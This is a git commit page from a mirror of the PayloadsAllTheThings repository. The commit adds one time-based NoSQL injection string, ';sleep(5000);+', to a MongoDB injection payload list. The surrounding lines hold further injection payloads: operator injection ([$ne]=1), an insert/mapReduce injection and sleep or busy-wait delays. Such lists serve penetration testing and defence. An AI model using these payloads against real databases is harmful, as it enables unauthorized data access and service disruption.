mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings
synced 2025-12-06 08:54:40 +01:00
Further payload added
This commit is contained in:
parent
be12684bc0
commit
4892dc6577
1 changed files with 1 additions and 0 deletions
|
|
@ -17,4 +17,5 @@ db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emi
|
||||||
[$ne]=1
|
[$ne]=1
|
||||||
';sleep(5000);
|
';sleep(5000);
|
||||||
';sleep(5000);'
|
';sleep(5000);'
|
||||||
|
';sleep(5000);+'
|
||||||
';it=new%20Date();do{pt=new%20Date();}while(pt-it<5000);
|
';it=new%20Date();do{pt=new%20Date();}while(pt-it<5000);
|
||||||
|
|
|
||||||
Loading…
Reference in a new issue